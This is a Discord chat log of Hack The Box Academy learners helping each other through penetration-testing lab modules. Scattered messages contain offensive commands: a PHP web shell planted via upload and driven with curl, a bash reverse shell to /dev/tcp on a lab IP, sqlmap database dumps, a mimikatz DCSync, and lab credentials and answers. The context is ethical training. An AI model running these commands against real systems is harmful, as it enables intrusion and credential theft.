#modules
and me flipping between them trying to troubleshoot and not finding the right combination
you wanna talk about a sanity check
6 HOURS LATER
i was working on JUST that host
for that long
if you need help with either of the other hosts if you don't have them already :)
i got them all now
i did them in sequence
hi what module is this related to?
i don't remember there being any modules related to instagram
at least in the penetration tester path

igshid is instagram share id if you're wondering
click/link tracker
googled it :)
oooh
you mean grabify link?
also i don't think this is that because the link is an instagram domain
yeah he's just trying to flex his small pp setup
Hey guys, working through the SQLMAP module and having a hard time understanding how to use this well so far. I've gotten it to spit out and show 5 vulnerabilities for question #1: What's the contents of table flag2? (Case #2)
I see the option to dump all tables and certain table names but am having a hard time figuring out how to add that to the request. I've initially run
Copy command as curl and switched to sqlmap as it shows.
he is rank 70 on thm 🤣 https://tryhackme.com/p/devilkabristan why tf do you have to spam bro??
"Bug cannot be Mistake, It's a big matter to Found Victim."
both cringe and dumb
Man had a stroke while he was writing lmao
Lool
you need to find the database and the table from the database to dump
Lmao
So since we already have database name I should just be able to name the database and go from there?
if you need help with the tag, there is a detail about each tag in the help menu. but for this hint: if you are having issues dumping the flag, then save the request into a file and run sqlmap with that file (-r tag). you may not need to do this, but this is what i have in my notes for case 2
Yea let me keep reading, just trying to wrap my head around it a bit. Feels slightly overwhelming/confusing at first
hint the table
enumerate the database and find the table you're looking for then try dumping the contents
jesus christ, even if he cheated, 1600+ tasks in 1 day?? no way, he must use a bot or something
Let me work with that info and see what I can get, need to keep rereading through as well.
Probably best to just leave it alone and let mods handle it at their discretion :) keep this channel on topic
yeah i may ask thm mod about this
@novel matrix
i think you are right on the 12 yo 🤣 half of his face reflects on one of the instagram images
yo if anyone wants some tools hit me up in dm's
big poppa Jabba is on your ass
Could I please get a hint for the password attacks medium lab? I am on the box as the user j.… I see what's running on the box but am unable to log in with already found creds on the found services running
hint check ||the key||
Checked … key for user j.. non-existent in his home directory. No access to user d for … key
oh wait sorry wrong user
this should be the right path
shoot me a dm on what issue you are having
Will do thanks!
I'm stuck at Active Subdomain Enumeration and finding the TXT record! I've tried "dig txt {subdomain}:{sub IP}" and get nothing back. If I try a zone transfer with these domains and IPs I just get transfer failed... what am I doing wrong? Any hints are greatly appreciated!
pls say what module you are in next time, but hint: you have to use dig txt (subdomain) @(target machine ip), because all subdomain IPs are dead, so you can only use the given target machine. also a zone transfer (on the right subdomain) will give you the flag for this question and some more subdomains
also, because all subdomain IPs are dead, it's not recommended to use tools for live hosts like nslookup
Hi Guys, hope you're well. I am stuck on Common Web Vulnerabilities. So the question is -
To which of the above categories does public vulnerability 'CVE-2014-6271' belong?
I check the hint and it says the following
It's one of the above! Simply search for the vulnerability description and read about it, and you'll know the answer.
So I read the description but it does not give any indication of the category.
GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka "ShellShock." NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.
I have tried
-GNU Bash
-Bash Linux
-OpenSSH
-sshd
-mod_cgi
-mod_cgid
-Apache HTTP Server
No luck. If anyone can help that would be great.
Many Thanks
Hey, is there a command to download the openvpn key on a personal VM without going to the relative webpage? The web instance doesn't seem to want to start and might as well practice using commands more as I'm rather new. Thanks in advance!
for that nope
you should be able to download the VPN file on your host OS and put it in a shared folder
which module and section are you in?
there's no other way than to download it from HTB academy but if you don't want to download it on the VM you can do the shared folder method
Common Web Vulnerabilities is the module and the program is INTRODUCTION TO WEB APPLICATIONS
Alright thanks!
yeah, the description of this cve i don't think will give you the "exploit categories". you have to choose one of the 4 that were given in the section based on the description
If you download it, if you look at the downloads there is a remote file download location: should be able to wget and copy that, though most VMs have a way to just copy over files easily
I tried these and they did not work. I have tried
-GNU Bash
-Bash Linux
-OpenSSH
-sshd
-mod_cgi
-mod_cgid
-Apache HTTP Server
none of that is given in the section
Have I got the correct description?
nope
Ok so the hint says "It's one of the above! Simply search for the vulnerability description and read about it, and you'll know the answer." Is it in that section?
yep, "one of the above" means one of the categories shown in the section
ok let me look into this and come back to you
The mission of the CVE® Program is to identify, define, and catalog publicly disclosed cybersecurity vulnerabilities.
i just checked that one, how tf did i miss it 🤣
Would it be in here
As i was there, that is where i got the description from, but @vital adder is saying it's on the page.
because this module spoiler... give me a sec, i'll dm you
@vital adder is absolutely right. The solution is on the page
also pls remove this
Sorry all done now
Hey all, I am working on the hashcat academy module. I am stuck on the "working with rules" section. I have tried running this command and a couple others like it "sudo hashcat -a 0 -m 100 <HASH FILE> <ROCKYOU WORDLIST> -r <RULE FILE>"
In the rule file I have it set as "$2$0$2$0". It keeps on telling me that it is exhausted. Can someone help point me in the right direction?
$1-4 are user defined wildcards
If I add --stdout on the end of the hashcat command it prints the contents of the rockyou.txt wordlist with 2020 appended to the end of each entry, so I don't think that it is the rule
stop your proxy
You need to add your rule, not replace it
It's Burp's built-in browser / intercept is off
stop it then
I've also tried on other ones, it's not on
if you see this, it means that somewhere the request is being intercepted
I thought that I had added it with the -r after listing the wordlist.
I mean the rule itself. Take the rule from the module and add your rule.
|| $ echo 'so0 si1 se3 ss5 sa@ c $2 $0 $2 $0' > rule.txt ||
Pivoting/Port Forwarding/Tunneling is one I think I need to take one chunk at a time, it makes my tiny brain hurt
are you running that sqlmap command or are you running it against a spawned target?
its running against a spawned target
sqlmap -u "http://ip/?id=1" --banner --current-user --current-db --is-dba
For some reason i can't ping target, even from within pwnbox
then it is offline or sth. Maybe the time is up
nah, restarted it a million times, also downloaded the vpn files numerous times to try it from my os, same result
trouble with an htb academy module?
No lol
then go somewhere else :)
Does anybody have a link or know how to hack professionally
^
see Rule 4 - #rules
are you requesting a service?
Yes
in what way?
sorry, nobody here will take you up on your request.
But u guys give hacking tips
sure, but we deal with ethical hacking
now i would suggest taking business elsewhere so the channel doesn't get clogged
hello house
@quiet musk first: ask to DM; second ask here first prior to jumping straight to DMs :) http://dontasktoask.com ; http://nohello.net/en
Hello, I am on the module CROSS-SITE SCRIPTING (XSS) and I am stuck at XSS discovery. I tried different answers on both questions, don't know if I can have help. Thank You
okay i'm trying to locate the bash! in HTB ACADEMY can someone help me!
Ok, I've checked a different module, 'File Inclusion', and it works, the problem is only with 'Introduction to Windows Command Line'
sorry i still don't understand please
Is the IP you're trying to reach a public IP or does it start with 10.?
starts with 10
doesn't work only for one module, the windows one; works fine with the file inclusion module, both from pwnbox or my system thru vpn
i can check other modules if needed
File Inclusion doesn't use Private IPs (10.). It's using public ones
oh ok
So my guess is that something is wrong with your VPN. Make sure you're connected. You should be able to see a tun0 interface if you run ip addr in terminal
Or run ip route and you may see the IP you want to get to in the routes
doesn't work also from pwnbox so nothing to do with vpn connection i think
linux fundamentals module also responding very nice
Ah I see. There are a couple sections that use Private IPs. I've had to download a different VPN config before (us-academy-1 / us-academy-2) and refresh the target before
I've tried all 4 free ones already, even switched between tcp and udp
Last week, I had to switch from us-academy-1 to us-academy-2. Not sure why. us-academy-1 is working now though
no worries, ill try few more things and just leave it for few days, anyway thanks for help!
pity, i was enjoying this windows stuff, realised how little i know
Sorry I'm not more help. I don't have that module unlocked or else I'd fire it up to check
No worries! Thanks for help!
Good evening, I just cant find the path to the second flag in the SQLMAP MODULE ESSENTIALS question: "Use SQLMap to get an interactive OS shell on the remote host and try to find another flag within the host."
Ive tried using the script:
echo '<?php system($_GET["cmd"]); ?>' > shell.php
Verified the upload with:
curl http://165.22.123.238:30635/shell.php?cmd=ls+-la
changed cmd=ls+-la in the above url to cmd=dir /
and tried navigating through the directories to locate the other flag.
The question hint says "The flag is in a very common directory"
Can someone help specify the directory of the second flag, nudge me in the right direction, or dm me?
Can someone help me with the Archetype box?
no
for the footprinting medium module, is 'nobody' supposed to be the owner of the mounted directory?
cannot seem to access it after switching to the user, the UID is the same in passwd
it seems like the user is "squashed" :) maybe look into that or maybe switch to root and see if you can explore that share
I'm trying to cURL, but it appears that my machine is broken. It won't display the results. My input is either curl 134.122.103.40 -v or curl 134.122.103.40:31440 -v, but it just gets stuck saying Trying 134.122.103.40:80. Any advice?
I have a question about a beginner module I'm stuck on. Is this an appropriate place to ask?
Nevermind actually, it just worked after 30 minutes of trying face palm
i was able to get access to it, got the sa user but SQL login doesn't seem to work
What module & what's your question?
What type of account can be found on most ( if not all ) windows systems?
It's dumb. Fawn. My issue is, I'm connected via VPN, it wants me to be before I can spawn the machine -- easy. But it thinks the Fawn machine is already active so I can't spawn it. Is there a way to close all of my active machines?
Fawn is a box in the starting point machines list; you can verify your account in #bot-commands by typing in ++verify and ask your question in #starting-point, or use the search feature in the top right of discord to search if your question has been answered. You can also try and get in touch with support by expanding that lefthand menu and clicking on "Contact Support"
Administrator... ?
elaborate from that and you'll be able to get what you need
:)
also google "what does 'sa' stand for in windows account name" :)
or specifically what does sa stand for in sql
server auth?
or
system administrator
yep
but the last few things i mentioned are just more for further exploration; you have all the info to get what you need
i mean
after connection was established with server
that's fairly standard when remoting in on htb machines
are you using 'Administrator'?
yes
are you trying to rdp in with admin?
did it now, im in server manager
Gl then you should have it from here
Should be able to access the sql manager with him
And creds
got it @fathom pendant tyvm
#starting-point doesn't seem to exist
I'll just wait til support comes back tomorrow
Read #welcome , I think you need to verify first
i did
hi everyone
I'm having trouble in the web requests module CRUD API. These are the inputs i used curl http://161.35.37.149:31486/api.php/city/London -X PUT -d '{"city_name":"flag"}' -H 'Content-Type: application/json'
curl http://161.35.37.149:31486/api.php/city/Birmingham -X DELETE -H 'Content-Type: application/json'
curl http://161.35.37.149:31486/api.php/city/flag
but the result from my last input is just empty brackets. What am I doing wrong?
This is the question: First, try to update any city's name to be 'flag'. Then, delete any city. Once done, search for a city named 'flag' to get the flag.
Has anyone completed noSQL injection Skills Assessment II? I tried everything in the module and failed. Can someone give me some advice
I'm having an issue getting the second question answered in the Automating Payloads & Delivery with Metasploit in the Shells and Payloads module. I can't seem to find the right method for authenticating into the target machine.
Help! Having issue with -exec ls -al in my string, says missing argument to ‘-exec’
Thank you for you help, I was able to find the answer!
Having some more sqlmap troubles (question #2).
We know that the cookie is intentionally vulnerable and I don't understand why everything I run says it's not vulnerable.
I'm using sqlmap -r file.text --data="Cookie: id=1"
Also trying --cookie as well and everything shows as not vulnerable
Thought sqlmap would be a breeze but this is kicking my ass
yep, you need to figure out what works. If you've got a cookie, you definitely need to put that
Did figure it out with some help Note that also the HTTP Cookie header is tested against SQL injection if the --level is set to 2 or above. Read below for details.
it's weird, It is mentioned in later sections. But sometimes checking later sections helps
My brain was hurting....I reread a bunch and just did not understand why I was not able to do it
Big ass highlight in the notes lol
I was also being dumb and putting in --data when its not a post request
< but we got through it eventually
it just takes a bit of time
Can someone break down this reverse shell command in english?
sh -i >& /dev/tcp/10.10.14.107/1337 0>&1
Just trying to understand how this establishes the reverse shell from the target
I get the call out to the IP / port. But having trouble with the & redirect
there is also a module explaining that
Thanks
shells and payloads I guess
explainshell and ChatGPT do a great job explaining a lot of stuff in plain English.
let me ask chatgpt
Yea. ChatGPT is goated for explaining pretty much any piece of code or command you'll ever need explained
Hi, anyone can lend a hand for "Skill Assessment - Broken authentication"?
and it is amazing. Explains so clearly
where are you stuck? Feel free to DM
I try to download pwndoc but I get this error -
```
] {
  opensslErrorStack: [ 'error:03000086:digital envelope routines::initialization error' ],
  library: 'digital envelope routines',
  reason: 'unsupported',
  code: 'ERR_OSSL_EVP_UNSUPPORTED'
}
Node.js v18.14.0
The command '/bin/sh -c npm run build' returned a non-zero code: 1
ERROR: Service 'pwndoc-frontend' failed to build : Build failed
```
How do I resolve this error?
and also this --> Error: error:0308010C:digital envelope routines::unsupported
When I run this command --> sudo docker-compose up -d --build
Hi everyone! If someone can help on the module « Password attacks », I'm stuck with the Will and Kira credentials. I tried a few things but nothing seems to happen
Refrain from posting flags in your post :)
try lowercase
also are you using the provided password, and custom.rule to create?
note the users do come up quite a bit so saving their password somewhere isn't a bad idea
hello
Hello! can someone please help me on the module "Information Gathering - Web Edition" in the section "Web skill assessment" in the last question! Please! 🙂
@hallow swift what is the last question
Perform subdomain enumeration against the target githubapp.com. Which subdomain has the word 'triage' in the name?
@hallow swift use this https://subdomainfinder.c99.nl/
module - setting up
section - organization
issue related to PS1 variable
question - where do I put PS1 variable in .bashrc file to display the date and time.
I used ffuf with the rockyou wordlist, but it didn't work
@hallow swift use https://subdomainfinder.c99.nl/ u will find subdomain
damn that was so easy, I was breaking my brain
Any help with the DNS quiz at Attacking Common Services? I have already discovered some subdomains using subbrute (cl and h*k with their IPs), however I can not proceed from there. Zone transfers are not allowed.
@alpine dome how
I have used dig as a first step, discovered ns.inlanefreight.htb and moved on with subbrute.
Ok, you are trying to look for zone transfer or
That means zone transfer is not allowed
The other step is bruteforcing, which has revealed two subdomains with unreachable IPs
@alpine dome put the ip address in resolver and try to brute force the subdomain
I think I have tried that as well. I will try it again.
what do you mean by unreachable ips?
@alpine dome like this python3 subbrute.py inlanefreight.htb -s /usr/share/seclists/Discovery/DNS/fierce-hostlist.txt -r ./resolvers.txt
Yep, tried various wordlists as well.
Let me give it another shot.
Honestly, Academy is a huge waste of time sometimes.
@alpine dome it would be easy if u first delete all the ip addresses that are in resolver.txt before u add in your ip address
The whole "try harder" mentality in this field has gone beyond toxic.
hahaha
my dig didn't work with that section, also other people had the same problem
In the previous module, I had to waste 30 mins in each task to crack a password.
I ssh to server and get the info that way
I mean you can do it in one task, but spending 2 days in such a huge module waiting for passwords to crack? Is this supposed to be educational?
I have thought of that, however I want to complete it the intended way. If it will allow me.
Some times try harder kills me
It's more like "f*ck you harder" the way it is. Making things hard for the sake of being hard or keeping your reputation is simply awful.
The thing is that I want to take the exam but I can not do so before I complete the path. I have to spend hours trying to figure out what was the creator thinking.
@alpine dome me too i want to take exam
for the hard lab in footprinting, how do i know that there is a mysql server running on the machine when i connect as ||tom||
i read somewhere that mysql is running, but what command can i run to view this?
thanks
it's a bit of a real-life kind of deal. some tools are not going to work and you need to find alternatives and such. Which is what happened. People couldn't use sqsh in pwnbox. After the sqsh update something was broken, I guess.
Yes, the thing is that I do not need to bust my head over stupid questions having to guess what the creator was thinking just to take the exam. Let me buy my voucher and let me fail. After all, this whole frustration with the ambiguous and vague tasks has nothing to do with proper learning. It is just another trick to keep users subscribed and raise a reputation of being harder than OffSec
In all due respect, I love HTB and I have learned and keep learning tons of it. But the academy modules are simply hard and vague just for the sake of it.
For the problem you are having right now, I totally understand. It is not because it is difficult or anything. It's all because stupid dig is not working properly
Maybe it is not supposed to do so. Maybe they want us to go and find the config file. But HINTS US!
Another completely disturbing thing I noticed. Many times, the hints are not just hints, they are part of the solution. Without them, you can go nowhere. When you classify something as a "hint" it should be considered something extra, not an integral part of the solution.
I agree about the hint thing, caused me some headaches
about to do the windows priv esc skills assessments, i can tell it will hurt my brain already 😛
agree about the occasional hint being mandatory is annoying, and sometimes working your way through different wordlists is annoying, but overall it is great content. just get on with it
everyone is helpful in here, you'll never get stuck for too long
hello again, I am still stuck at SQLMap Essentials: Skills Assessment
I have looked at the forum.hackthebox for this Skills Assessment, and I have done everything from simple stuff to hard-complex stuff, but have a look at the command and you can find my mistake(s)
sqlmap -r req.txt --technique=S -D testdb -T final_flag --dump --tamper=[tried all of them] --skip-waf --no-cast --level=[tried from 0-5] --batch
and tried scanning for tables, and nothing really was useful
well, not sure. But, I havent used this many flags at the same time
well i tried many things, that's just a sample, all from simple stuff to many flags stuff
why are you looking into testdb?
i don't know the name of the intended table, i have looked at the table names, but i didn't get anything
You don't need so many flags and play with -v. That'll give you something to work with
first get the database names. step by step
ok, i will start from there
or if you dont mind waiting, as it is time-based. You can dump it all
actually I am going some where right now, so that seems a great idea. thx alot
you are welcome
@sleek urchin check in your dm
For those doing the AD Enum & Attacks assessments, some advice - refer to ligolo if you think that you need to port forward something, it will make the steps quite a bit easier
In the dns footprinting the hint says "Remember that different wordlists do not always have the same entries", the last part "same entries" what is it supposed to mean in this context? (I'm trying to brute force a domain using dnsenum)
Guys, is this the place where you post your questions about the modules you practice with if you get stuck somewhere? I just enrolled with silver annual, and it says there will be lab guidance via discord, should I expect someone from HTB Academy officials or is this channel what I am looking for?
As far as I know this channel is to ask questions, and maybe someone will help you
thx bro
It means different lists have different words
https://www.hackthebox.com/newsroom/discord-lab-tutoring @marble geode
thx a bunch!
Imo one-on-one is kinda a meh selling point
have you ever used that
Well I say it's meh when this channel exists
Like yeah you're not gonna get 1-1 unless someone DMs you about it. But a LOT of the common questions/issues have been asked and answered here if you know how to utilize discord search feature
sure. But still got curious about it. haha
The biggest selling point for me with silver annual would be : exam voucher, t0-2 modules full access
hmm, that kinda popped up first time after i enrolled silver, guess I just need those cubes to unlock modules and the voucher I gotta use for exams later, still good to have 1 on 1 tutorial, wouldn't hurt to have those accelerators
right
anyone that can give me some help on Footprinting Lab - Hard, I got the key from imaps. Like most others, I get the "Load key "id_rsa": error in libcrypto, Permission denied (publickey)" error. I have used chmod 600 on the key. Command I use: "ssh -i private_key ***@10.129.1.1" in the same folder as the key.
The 1-1 only comes up if you answer incorrectly 3 times
Edit it to make sure there's no weird extra line at the end, copy and paste it in a different editor and try that.
Sometimes it not working is a weird quirk of text editors
hmm, I tried nano and leafpad. Any editor you can recommend, except vim?
Lol I'd say copy paste again and double check you have it copied fully
Including the ---START and ---END , lines
Just wanna say that chatGPT is a great source to understand things
chatGPT can also be confidently incorrect
bummer Lol
Like you can ask it about specific command syntax meaning but further than that is where it can fall apart
what did you ask?
it's a bit weird, how would they know if you used it or not
you can connect with a different network with a different pc. Even if someone hacked your whole network which I dont think so
Part of the exam is writing a report :)
you meant it is prohibited, right?
Yes barred/prohibited
still not working
Hmm
Hey I was wondering, what are those mini modules in the academy? I know there are none available at the moment hahah, but can anyone give some insights as to how they gonna work or what content will they have?
Try updating/upgrading your VM os
As there are none available, kinda hard for us to speculate but maybe @west canopy knows, he knows everything
Yeah lol, I was honestly wondering cause I think it's already there a couple weeks but there's nothing in there 😅
I'll wait for his answer, thanks ☺️
stuck at active directory skill assessment part 1
got s*_s* creds and bloodhound but couldn't connect to sql through proxychains. not sure how to get to ms01 from WEB-WIN01
tried evil-winrm and nmap host discovery through proxychains but no luck
anyone can give a nudge
Hey Guys,
I'm trying to play with the new module : Abusing HTTP Misconfigurations
I'm having trouble with the Advanced Cache Poisoning Techniques.
I've setup the vhosts fatget.wcp.htb and cloack.wcp.htb but I can't make the payload work in any of them.
I believe there is something wrong in the server as I should have the Python web framework Bottle for cloack.wcp.htb and wappalyzer is returning PHP.
Can anyone from staff confirm/help ?
When i use the custom.rule it creates a list of "LoveYou1" uppercase, I didn't see a lowercase like the custom.rule that was used in a different section
Hello ! Someone could help on rdp socks tunneling with socks rdp. I have done exactly the same of our course and when i launch proxifier for rdp i cant connect to 172.16.6.155
It is possible to change the photo of the profile in the htb academy?
possible - yes; tricky - also yes
Is it in academy.hackthebox.com/settings?
Yes the image is from gravatar.com
Password Attacks - Pass the Ticket: I am stuck on the last question but believe I am close to figuring it out. However, I am wondering if I have to find a way to get root level access in order to complete this question or if there is another way to read the file I need to read. Any hints or help?
hack the box is asking to submit the root flag, what do i write in the answer box? i didn't find the answer
@latent umbra You have to find the flag.txt on the machine you are working on
In the ACL enumeration portion of the Active Directory enumeration module for Pentester path, what is the answer to the last question of rights forend has over GPO Management group, given that the search apparently takes 30 minutes and bloodhound isn't giving the answer.
Thank you for your help.
Also, does anyone have a comprehensive list of ACE types? Why doesn't Microsoft provide one?
hi anyone here
Hi, there is a question on the NMAP module: "Based on the last result, find out which operating system it belongs to. Submit the name of the operating system as result." I tried all the operating system names and none shows as right. Your help will be highly appreciated.
Which one have you tried ?
Parrot
ParrotOS
Parrot Security
Password Attacks - Pass the Ticket: Solved this issues, found the way to answer the LINUX01 question at the end. Hint: || You need root access to get to the files you need which are on the LINUX01 system. ||
guys I'm sorry, i just wanna know, i submitted my first user flag, and I'm happy with that, I wanna share it but the share result is not clickable, why 😦
@light cedar Not sure but congrats! What machine?
Stocker
Guy,s can anybody help me answer my question?
Have you tried to find the OS with Nmap? Something like -sV
Someone could help on rdp socks tunneling with socks rdp. I have done exactly the same of our course and when i launch proxifier for rdp i cant connect to 172.16.6.155
@gray blade can't see any OS name. Am I not doing the things right?
sudo nmap 10.129.2.28 -sV
@light cedar @iron basin this channel is for questions regarding modules on hackthebox academy; you can verify your account in #bot-commands
That's not gonna be an OS scan, try -O
-sV is a version scan, -O is OS, -A is aggressive/multiple scans bundled in one
Thanks. Trying with those options. It seems my target machine is down
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Use -Pn
Thanks.
Be careful with spaces
Not sure if there is a way to put a screenshot in the discord chat. I get
Too many fingerprints match this host to give specific OS details
Am I doing it right ?
sudo nmap 10.129.2.28 -O -sV -Pn
Try everything that the room teaches, -sn, --disable-arp-ping,-A etc...
Thanks
Can i have help on rdp socks tunneling with socks rdp please ? ^^
Did you get it ?
Im stuck, i have done exactly the same of our course and when i launch proxifier for rdp i cant connect to 172.16.6.155
With jason user
@zenith gazelle I could not make it work yet. Does not show OS info.
In what section are you exactly?
At the end of "Host Discovery"
rdp socks tunneling with socks / forwarding
Try just scanning one port that you've discovered with -p{port}
But also if you take a look at the version of one of the services you can make an educated guess
Thanks @fathom pendant
In what section are you exactly?
Me?
question on resources for visualizing SQL queries? I'm working on SQLmap - Attack Tuning #2 and I'm not understanding the process / steps I should look and and take to figure out what these non-standard boundries are
Host Discovery section
Nah bro, sorry about that, I don't know how to help you
Can anybody see what the OS here?
Yes, but you should find the OS name
Thanks @gray blade . I am trying with this -
sudo nmap 10.129.2.49 -O -sV -Pn --disable-arp-ping
Try all commands and you will find 😉
have you tried including safe scripts, perhaps it can help you determine the thing you need
Hi @autumn pilot, could you help, how can I do it with safe scripts?
also I can see the answer in the output that you have provided
Yeah man you are welcome 😅
Could you point me? I put everything I see there, but nothing works. For example Ubuntu.
Read the question in the exercise again, you will notice your mistake
It says "Based on the last result, find out which operating system it belongs to"
I gave -
Ubuntu
Linux
Parrot
ParrotOS
Nothing right.
sounds like you're guessing
look at the "Scan Network Range" snippet and focus on the ICMP packets
What led you to believe it to be one of those?
Someone could help me with RDP SOCKS tunneling (socks rdp). I have done exactly the same as in the course, and when I launch Proxifier for RDP I can't connect to 172.16.6.155
As nothing says right I started guessing which is not right though
@bleak apex why everything you mentioned is linux and icmp packets are same
I am very new basically
I know you're new, I was wanting you to examine the thought process that led you to your answers. If you're just guessing though, that's never going to be helpful. Even if you guessed right you won't know why you're right and will have cleared the section without learning.
I agree.
Thanks, the list is really helpful but I am puzzled here 😦
Write out what's puzzling you
use that and use what I have given you
Thanks @autumn pilot
As per the report the OS is Linux ? But it does not say it right.
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-14 19:52 GMT
Nmap scan report for 10.129.2.49
Host is up (0.077s latency).
Not shown: 993 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
110/tcp open pop3 Dovecot pop3d
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
31337/tcp open Elite?
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
Network Distance: 2 hops
Service Info: Host: NIX-NMAP-DEFAULT; OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
okay, let's go back a few steps
on which module and section you are currently working
Module: Network Enumeration with Nmap
Section: Host Discovery
Host discovery doesn't have a target, from where have you obtained that output?
@autumn pilot Thanks I got it. You are completely right with that chart. Many thanks !!!
np young padawan
Anyone did the Active Directory skill assessment 1? I need a nudge. Found creds but couldn't connect to MS01
- AD Enumeration & Attacks - Skills Assessment Part I
- Submit the contents of the flag.txt file on the Administrator desktop on MS01
proxychains evil-winrm -i <internal-ip> -u <username> -p <password>
proxychains xfreerdp /u:<username> /p:<password> /v:<internal-ip>
is that from Enum & attacks?
yes AD enum & attacks
^ this might be helpful and make your life easier
thanks, I'll try ligolo. I've been doing it with chisel
for MS01 I think I used the hash rather than the password skill assessment 2
I've heard good things about ligolo but I cleared both sections fairly well with chisel
when I try this command PowerShell hangs.
$password = ConvertTo-SecureString "password" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential ("domain\target-username", $password)
Enter-PSSession -ComputerName hostname -Credential $cred
also
.\mimikatz.exe
can anyone be of assistance with the documentation & reporting skills assessment? I have a bunch of user names and passwords at this point but don't really know what to do with them. Feel free to DM me 🙂
also what is the answer to: " Steve is learning about the tool that can make logging a session easier. He messages you for help mentioning that he would like to try to split the panes vertically. What do you tell him? (Answer format: [key] + [key] + [key], i.e., fill in the values for "key" and leave the brackets and + signs.)" Is it not [B] + [Shift] + [%] ?
check out the SQL Injection Fundamentals module
Super confused about some PHP presented in the 'File Upload Attacks' module. I completed it yesterday; now I'm going over the process from a blue team perspective. I don't want to post the code here as to avoid spoilers. Can someone pm me plz?
@static roost DM me, I just finished the module the other day. Maybe I can help
Does anyone know what to do for Network Enumeration hard 🤔? Been stuck on this for days now
Please DM me if you have any tips
Htb should make a module about social engineering
How to defend yourself from it
And recognize it
It worked ligolo and chisel. Forgot to arp and check subnet😅
👍
Can I have help with the final question of Password Attacks Pass the Ticket (PtT) from Linux?
I'm in root, and I ran linikatz, but I have been having trouble since then
Mostly common sense
Look into Linux kerberos directories :)
Specifically the daemon that connects it
|| so /tmp ? ||
|| cuz I keep getting NT_Status denied when i try to use smbclient with files from /tmp ||
linux kerberos tickets are just files
There has to be a permanent place to store the file for Linux to connect to the dc
Etc.
I think
Either way there's a client that runs kerberos, that may help you
Got it
Thanks for the help!
I didn't look at the instructions in the module close enough
could I also have a sanity check for attacking common services 'Attacking SQL Databases'?
I know this section was having issues in the past
I had no luck with sqsh. had to use mssqlclient
and i tried that too lol if you look at the picture
And i am very confident i entered the right password. Tried this multiple times
:wq!
so if anyone wants to double check that would be sweet. I am going crazy
are you sure thats the right user
damn
LOL
You did the same thing I did huh forgot the b
If I cancel my HTB academy subscription for a while to focus on my academic studies, would my progress be lost?
Any modules you completed stay completed
Alrighty, thanks!
Can someone help me in crackmapexec skills assessment first question, I think I'm doing something really stupid
Shells and Payloads _Live Engagement-Host 3: can someone throw me a hint.. I have || tried using a SMB exploit, no luck--locked out now..can do the webshell, but cant access the flag ||
also one more question. How do i log into the database with mssqlsvc? I tried using xfreerdp and mssqlclient.py
like I've been stuck on this one section for such a long time 🤣
module:SHELLS & PAYLOADS
Sec: laudanum, One webshell to rule them all.
2nd question being "Where is the Laudanum aspx web shell located on Pwnbox? Submit the full path. (Format: /path/to/laudanum/aspx)"
I have the shell on the server so that's all good, but when I'm trying to move directories nothing is working. I'm just stuck in c:\windows\system32\inetsrv
any hints?
what are you looking for in the directory?
don't you just find the directory to the aspx web shell and be done
with the Blue exploit make sure you are using the correct callback address; hint check what other IPs the system has
yeah, I thought that would be the case, but it's not letting me navigate..
I guess my hint is... there isn't anything to find haha
its just a Q&A...for me I use kali so i had to use the Pwnbox terminal to find the directory of the shell because its different from kali
yeah. i use both tbh. for this im using pwnbox
just seems weird i have the shell on, can systeminfo and get reply. but cant navigate at all
im probably just being an idiot tbh....
iirc you dont need to use the shell...just find the directory on your pwnbox
i mean you do for question 1
lol fml
if you are still stuck on this you can either use
sqsh -S (IP) -U htbdbuser -P 'MSSQLAccess01!' -h
or
impacket-mssqlclient htbdbuser:'MSSQLAccess01!'@(ip) -p 1433 -windows-auth
edit: if mssqlclient doesn't work with the htbdbuser user, remove the -windows-auth tag
my bad, I'm an idiot and didn't read the question properly
that's a spoiler dawg
oh shit
anyone can help with Active Directory Enumeration & Attacks
Skills Assessment Part I
final question - Take over the domain and submit the contents of the flag.txt file on the Administrator Desktop on DC01. not sure how to go about doing this dsync I have tpe..... credentials.
hi all
the dsync section should show you 2 methods of exploiting this and both work for me
ok ill review that section again
Hi, I'm new here. I'm kind of confused on how to get guidance for each machine? I have no idea what to look for in each one.. Isn't there some kind of tutorial or steps?
Thanks!!!
@bitter vine @stable phoenix give both of these videos a check if you guys are new to hacking
https://www.youtube.com/watch?v=0vu_Hs4N8B8
https://www.youtube.com/watch?v=4JZjj_H4ei4
this channel is for the academy modules; if you need help with boxes, verify your account and ask that at #boxes
Oops sorry
hey have you done the pivoting/tunneling/portforward module? Currently trying to get the DLL to load (but the DLL keeps disappearing when I try and load it xD)
sorry for the late response but for that first disable the av and remember to run the cmd as administrator
I dug through the history and yeah did that, now I have to actually get connected, I have to connect via the first host yeah?
yep the whole point of this section is you can connect from the first host to the third host using the second host as a proxy
so kinda dumb
ohey it worked :^)
The only thing I majorly disliked about this is that you used the SAME hosts
which made some things trivial since you could kinda work around some of the things by using other methods
got it :) I was just making sure I wasn't doing something dumb; just socksoverrdp itself is dumb LOL
ugh I don't feel like fighting things tonight to do the skills assessment LOL i think I'll pick it back up in the morning
were you able to get mimikatz to work to do the dsync? for the final question of ad enum asessment 1
Yep and hint you have to run mimikatz as the right user
ok thanks for the hint, looks like mimikatz dsync worked, got the administrator hash.
damn, gonna have to continue this tomorrow
I tried to start a module and it's having me sign in to my HTB account, but when I enter my email it says it doesn't recognize it
